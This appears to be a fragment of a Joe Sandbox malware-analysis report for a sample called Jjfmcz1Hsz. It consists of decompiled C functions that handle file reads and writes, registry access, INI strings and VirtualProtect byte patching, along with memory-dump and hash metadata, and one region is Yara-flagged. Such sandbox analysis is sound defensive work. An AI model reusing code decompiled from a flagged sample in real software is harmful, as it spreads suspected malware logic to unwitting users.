                                                                                                                                                                            								}
                                                                                                                                                                            								goto L25;
                                                                                                                                                                            							}
                                                                                                                                                                            							L22:
                                                                                                                                                                            							 *((char*)(__esi + __edi)) = __bl;
                                                                                                                                                                            							if(_t38 == 0) {
                                                                                                                                                                            								 *(_t35 - 4) = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L24;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L25:
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}






                                                                                                                                                                            0x0040255e
                                                                                                                                                                            0x00402561
                                                                                                                                                                            0x00402566
                                                                                                                                                                            0x00402569
                                                                                                                                                                            0x0040256c
                                                                                                                                                                            0x004028cf
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x00402572
                                                                                                                                                                            0x00402572
                                                                                                                                                                            0x00402579
                                                                                                                                                                            0x0040257b
                                                                                                                                                                            0x0040257b
                                                                                                                                                                            0x00402580
                                                                                                                                                                            0x00402608
                                                                                                                                                                            0x00402608
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402586
                                                                                                                                                                            0x00402587
                                                                                                                                                                            0x00402592
                                                                                                                                                                            0x00402595
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402597
                                                                                                                                                                            0x00402597
                                                                                                                                                                            0x0040259a
                                                                                                                                                                            0x0040259a
                                                                                                                                                                            0x004025a3
                                                                                                                                                                            0x004025aa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004025af
                                                                                                                                                                            0x004025d8
                                                                                                                                                                            0x004025b1
                                                                                                                                                                            0x004025b5
                                                                                                                                                                            0x004025e2
                                                                                                                                                                            0x004025e8
                                                                                                                                                                            0x00402600
                                                                                                                                                                            0x004025f2
                                                                                                                                                                            0x004025f2
                                                                                                                                                                            0x004025f5
                                                                                                                                                                            0x004025f5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004025bd
                                                                                                                                                                            0x004025bd
                                                                                                                                                                            0x004025c0
                                                                                                                                                                            0x004025c3
                                                                                                                                                                            0x004025c6
                                                                                                                                                                            0x004025c9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004025cb
                                                                                                                                                                            0x004025ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004025d0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004025d0
                                                                                                                                                                            0x004025ce
                                                                                                                                                                            0x004025c9
                                                                                                                                                                            0x004025b5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004025af
                                                                                                                                                                            0x0040260b
                                                                                                                                                                            0x0040260b
                                                                                                                                                                            0x004015a8
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004015a8
                                                                                                                                                                            0x00402595
                                                                                                                                                                            0x00402580
                                                                                                                                                                            0x004028d8
                                                                                                                                                                            0x004028de

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: wsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2111968516-0
                                                                                                                                                                            • Opcode ID: 7ea698501722721c26a8941e34d84e293da030ffcd79d9a631de662ee5d141bb
                                                                                                                                                                            • Instruction ID: f0e9407761540611d0924c316636f69a46329dcf8394c365819cdff4e6cfa024
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ea698501722721c26a8941e34d84e293da030ffcd79d9a631de662ee5d141bb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C210870C04299BEDF318B584A485AFBF749B01318F1480BBE891B63D1C1BC8A85EF1D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnumWindows
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1129996299-0
                                                                                                                                                                            • Opcode ID: 9c81f14efe7495ac2ffb74ba68771d23d2013c633a95154628fe4d1a986037f2
                                                                                                                                                                            • Instruction ID: e2691d69fef92dcb351be06dd66b504e98c3928a97d6786980fd1fb53c897e1c
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c81f14efe7495ac2ffb74ba68771d23d2013c633a95154628fe4d1a986037f2
                                                                                                                                                                            • Instruction Fuzzy Hash: A9F0F0711892699FC727CA1A99586C9FFB2EB81B10F24088ED3850B991D2322692C685
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                            			E00402616(void* __eflags) {
                                                                                                                                                                            				long _t6;
                                                                                                                                                                            				long _t8;
                                                                                                                                                                            				LONG* _t10;
                                                                                                                                                                            				void* _t12;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t17;
                                                                                                                                                                            
                                                                                                                                                                            				_push(ds);
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_t6 = E00402A1D(2);
                                                                                                                                                                            					_t8 = SetFilePointer(E00405C70(_t12, _t15), _t6, _t10,  *(_t17 - 0x1c)); // executed
                                                                                                                                                                            					if( *((intOrPtr*)(_t17 - 0x24)) >= _t10) {
                                                                                                                                                                            						_push(_t8);
                                                                                                                                                                            						E00405C57();
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}









                                                                                                                                                                            0x00402616
                                                                                                                                                                            0x00402617
                                                                                                                                                                            0x00402623
                                                                                                                                                                            0x00402630
                                                                                                                                                                            0x00402639
                                                                                                                                                                            0x00402875
                                                                                                                                                                            0x00402877
                                                                                                                                                                            0x00402877
                                                                                                                                                                            0x00402639
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                                                                                                                              • Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointerwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 327478801-0
                                                                                                                                                                            • Opcode ID: 709a1efb691e22b24d5139b65a0299c5cd3135bd5f72422e81660ad42db7e028
                                                                                                                                                                            • Instruction ID: 52cb416d5db8590b47b50ad60af093b1f6dbc599d2fc32e6c75259d831e6d5c7
                                                                                                                                                                            • Opcode Fuzzy Hash: 709a1efb691e22b24d5139b65a0299c5cd3135bd5f72422e81660ad42db7e028
                                                                                                                                                                            • Instruction Fuzzy Hash: 01E04F76A04104BAE701FBA56E4DDBF73AADB50319B60843BF601F00C1C77D89459A3E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00402283(int __eax, CHAR* __ebx) {
                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                            				void* _t13;
                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            				int _t22;
                                                                                                                                                                            
                                                                                                                                                                            				_t11 = __ebx;
                                                                                                                                                                            				_t5 = __eax;
                                                                                                                                                                            				_t14 = 0;
                                                                                                                                                                            				if(__eax != __ebx) {
                                                                                                                                                                            					__eax = E00402A3A(__ebx);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t13 != _t11) {
                                                                                                                                                                            					_t14 = E00402A3A(0x11);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
                                                                                                                                                                            					_t11 = E00402A3A(0x22);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402A3A(0xffffffcd)); // executed
                                                                                                                                                                            				_t22 = _t5;
                                                                                                                                                                            				if(_t22 == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t18 - 4)) = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t18 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}








                                                                                                                                                                            0x00402283
                                                                                                                                                                            0x00402283
                                                                                                                                                                            0x00402285
                                                                                                                                                                            0x00402289
                                                                                                                                                                            0x0040228c
                                                                                                                                                                            0x00402294
                                                                                                                                                                            0x00402298
                                                                                                                                                                            0x004022a1
                                                                                                                                                                            0x004022a1
                                                                                                                                                                            0x004022a6
                                                                                                                                                                            0x004022af
                                                                                                                                                                            0x004022af
                                                                                                                                                                            0x004022bc
                                                                                                                                                                            0x004015a6
                                                                                                                                                                            0x004015a8
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                                                            • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                            • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                                                                                                                            • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E00402B44(void* __eflags, void* _a4) {
                                                                                                                                                                            				char* _t8;
                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                            
                                                                                                                                                                            				_t8 = E00402A3A(0x22);
                                                                                                                                                                            				_t9 =  *0x40a7e8; // 0x19e5c8
                                                                                                                                                                            				_t3 = _t9 + 4; // 0x270
                                                                                                                                                                            				_t11 = RegOpenKeyExA(E00402B2F( *_t3), _t8, 0,  *0x4237b0 | _a4,  &_a4); // executed
                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                            				return  !( ~_t11) & _a4;
                                                                                                                                                                            			}






                                                                                                                                                                            0x00402b58
                                                                                                                                                                            0x00402b5e
                                                                                                                                                                            0x00402b63
                                                                                                                                                                            0x00402b6c
                                                                                                                                                                            0x00402b74
                                                                                                                                                                            0x00402b7c

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,00000270,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
                                                                                                                                                                            • Instruction ID: 6913ff832cf321f63cdd7bb00c8cc70b6829a5dd8220bacc95ff598af340a114
                                                                                                                                                                            • Opcode Fuzzy Hash: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7FE04FB6240108AFDB00DFA4DD46F9577FCE718701F008021B608D7091C674E5508B69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405A13(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                            				int _t7;
                                                                                                                                                                            				long _t11;
                                                                                                                                                                            
                                                                                                                                                                            				_t11 = _a12;
                                                                                                                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}





                                                                                                                                                                            0x00405a17
                                                                                                                                                                            0x00405a27
                                                                                                                                                                            0x00405a2f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405a36
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405a38

                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405A27
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                            • Instruction ID: edb1125888c6416cb1e0b95ca9609c2ac4c4c792cbd4e8f88826aa2405e91300
                                                                                                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                            • Instruction Fuzzy Hash: D7E0EC3261425EEFDF109E659C40AEB7B6DEB053A4F048532FD25E2150E271E8219FB5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004059E4(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                            				int _t7;
                                                                                                                                                                            				long _t11;
                                                                                                                                                                            
                                                                                                                                                                            				_t11 = _a12;
                                                                                                                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}





                                                                                                                                                                            0x004059e8
                                                                                                                                                                            0x004059f8
                                                                                                                                                                            0x00405a00
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405a07
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405a09

                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059F8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                            • Instruction ID: 6c2e581bc83b2d89c4a498056592e8f52b2bea012b9e1656670f40d352b29975
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0EC3272429AABDF109E559C44EEF7BACEB05360F048932FD15E3190D235ED219FA9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            
                                                                                                                                                                            				 *0x10004038 = _a4;
                                                                                                                                                                            				if(_a8 == 1) {
                                                                                                                                                                            					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
                                                                                                                                                                            					 *0x1000404c = 0xc2;
                                                                                                                                                                            					 *0x1000403c = 0;
                                                                                                                                                                            					 *0x10004044 = 0;
                                                                                                                                                                            					 *0x10004058 = 0;
                                                                                                                                                                            					 *0x10004048 = 0;
                                                                                                                                                                            					 *0x10004040 = 0;
                                                                                                                                                                            					 *0x10004050 = 0;
                                                                                                                                                                            					 *0x1000404e = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}



                                                                                                                                                                            0x10002714
                                                                                                                                                                            0x10002719
                                                                                                                                                                            0x10002729
                                                                                                                                                                            0x10002731
                                                                                                                                                                            0x10002738
                                                                                                                                                                            0x1000273d
                                                                                                                                                                            0x10002742
                                                                                                                                                                            0x10002747
                                                                                                                                                                            0x1000274c
                                                                                                                                                                            0x10002751
                                                                                                                                                                            0x10002756
                                                                                                                                                                            0x10002756
                                                                                                                                                                            0x1000275e

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                            • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                            • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                                                                                                            • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                            • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004022C7(char __ebx) {
                                                                                                                                                                            				char _t7;
                                                                                                                                                                            				CHAR* _t8;
                                                                                                                                                                            				CHAR* _t19;
                                                                                                                                                                            				void* _t21;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            
                                                                                                                                                                            				_t7 =  *0x409010; // 0xa
                                                                                                                                                                            				 *(_t21 + 0xa) = _t7;
                                                                                                                                                                            				_t8 = E00402A3A(1);
                                                                                                                                                                            				 *(_t21 - 0x34) = E00402A3A(0x12);
                                                                                                                                                                            				GetPrivateProfileStringA(_t8,  *(_t21 - 0x34), _t21 + 0xa, _t19, 0x3ff, E00402A3A(0xffffffdd)); // executed
                                                                                                                                                                            				_t24 =  *_t19 - 0xa;
                                                                                                                                                                            				if(_t24 == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                                                                            					 *_t19 = __ebx;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}








                                                                                                                                                                            0x004022c7
                                                                                                                                                                            0x004022cf
                                                                                                                                                                            0x004022d3
                                                                                                                                                                            0x004022e3
                                                                                                                                                                            0x004022fa
                                                                                                                                                                            0x00402300
                                                                                                                                                                            0x00401733
                                                                                                                                                                            0x0040267a
                                                                                                                                                                            0x00402681
                                                                                                                                                                            0x00402681
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
